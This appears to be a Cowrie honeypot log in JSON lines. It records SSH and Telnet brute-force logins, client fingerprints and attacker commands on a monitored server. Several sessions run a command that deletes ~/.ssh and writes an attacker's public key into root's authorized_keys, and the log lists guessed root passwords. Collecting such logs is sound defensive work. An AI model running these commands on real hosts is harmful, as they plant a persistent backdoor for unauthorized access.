{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T00:15:41.585441Z","src_ip":"212.227.125.160","session":"f5c206119f53"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:15:41.929012Z","src_ip":"212.227.125.160","session":"f5c206119f53"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T00:15:42.044168Z","session":"f5c206119f53"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55760,"dst_ip":"1.2.3.4","dst_port":22,"session":"548fdf03e9c0","protocol":"ssh","message":"New connection: 217.72.205.35:55760 (1.2.3.4:22) [session: 548fdf03e9c0]","sensor":"my-vps","timestamp":"2025-08-26T00:15:49.246997Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:49.248982Z","src_ip":"217.72.205.35","session":"548fdf03e9c0"}
{"eventid":"cowrie.session.connect","src_ip":"112.186.10.254","src_port":56430,"dst_ip":"1.2.3.4","dst_port":23,"session":"484b55bb26f9","protocol":"telnet","message":"New connection: 112.186.10.254:56430 (1.2.3.4:23) [session: 484b55bb26f9]","sensor":"my-vps","timestamp":"2025-08-26T00:15:54.189624Z"}
{"eventid":"cowrie.session.closed","duration":13.009014368057251,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:16:07.198555Z","src_ip":"112.186.10.254","session":"484b55bb26f9"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":48068,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fb7b37ccd77","protocol":"ssh","message":"New connection: 27.112.78.245:48068 (1.2.3.4:22) [session: 2fb7b37ccd77]","sensor":"my-vps","timestamp":"2025-08-26T00:16:44.148384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:16:44.149260Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:16:44.417003Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.login.success","username":"root","password":"Aj123456","message":"login attempt [root/Aj123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:16:45.529245Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:16:46.122867Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:16:46.123696Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:16:46.124647Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:16:46.394225Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:16:46.951744Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:16:46.952434Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:16:47.222859Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:16:47.223763Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":48072,"dst_ip":"1.2.3.4","dst_port":22,"session":"56b7d3a79732","protocol":"ssh","message":"New connection: 27.112.78.245:48072 (1.2.3.4:22) [session: 56b7d3a79732]","sensor":"my-vps","timestamp":"2025-08-26T00:16:47.489412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:16:47.490329Z","src_ip":"27.112.78.245","session":"56b7d3a79732"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:16:47.750181Z","src_ip":"27.112.78.245","session":"56b7d3a79732"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:16:48.832777Z","src_ip":"27.112.78.245","session":"56b7d3a79732"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:16:50.094861Z","src_ip":"27.112.78.245","session":"56b7d3a79732"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":48078,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4ed164fa745","protocol":"ssh","message":"New connection: 27.112.78.245:48078 (1.2.3.4:22) [session: d4ed164fa745]","sensor":"my-vps","timestamp":"2025-08-26T00:16:50.355689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:16:50.356615Z","src_ip":"27.112.78.245","session":"d4ed164fa745"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:16:50.617225Z","src_ip":"27.112.78.245","session":"d4ed164fa745"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:16:51.470905Z","src_ip":"212.227.125.160","session":"f5c206119f53"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:16:51.704903Z","src_ip":"27.112.78.245","session":"d4ed164fa745"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:16:51.965107Z","src_ip":"27.112.78.245","session":"2fb7b37ccd77"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:16:51.966244Z","src_ip":"27.112.78.245","session":"d4ed164fa745"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":33618,"dst_ip":"1.2.3.4","dst_port":22,"session":"760641fb9700","protocol":"ssh","message":"New connection: 27.112.78.245:33618 (1.2.3.4:22) [session: 760641fb9700]","sensor":"my-vps","timestamp":"2025-08-26T00:18:09.304978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:18:09.306210Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:18:09.565209Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcv1234.","message":"login attempt [root/zxcv1234.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:18:11.080137Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:18:11.649196Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:18:11.649767Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:18:11.651522Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:11.912180Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:18:12.515264Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:18:12.516085Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:18:12.778002Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:12.779481Z","src_ip":"27.112.78.245","session":"760641fb9700"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":33632,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b99c467731d","protocol":"ssh","message":"New connection: 27.112.78.245:33632 (1.2.3.4:22) [session: 2b99c467731d]","sensor":"my-vps","timestamp":"2025-08-26T00:18:13.046488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:18:13.047288Z","src_ip":"27.112.78.245","session":"2b99c467731d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:18:13.320654Z","src_ip":"27.112.78.245","session":"2b99c467731d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:18:14.440588Z","src_ip":"27.112.78.245","session":"2b99c467731d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:15.712390Z","src_ip":"27.112.78.245","session":"2b99c467731d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":59292,"dst_ip":"1.2.3.4","dst_port":22,"session":"76617779a7b9","protocol":"ssh","message":"New connection: 27.112.78.245:59292 (1.2.3.4:22) [session: 76617779a7b9]","sensor":"my-vps","timestamp":"2025-08-26T00:18:15.980061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:18:15.981054Z","src_ip":"27.112.78.245","session":"76617779a7b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:18:16.249453Z","src_ip":"27.112.78.245","session":"76617779a7b9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:18:17.374969Z","src_ip":"27.112.78.245","session":"76617779a7b9"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:18:17.643727Z","src_ip":"27.112.78.245","session":"760641fb9700"}
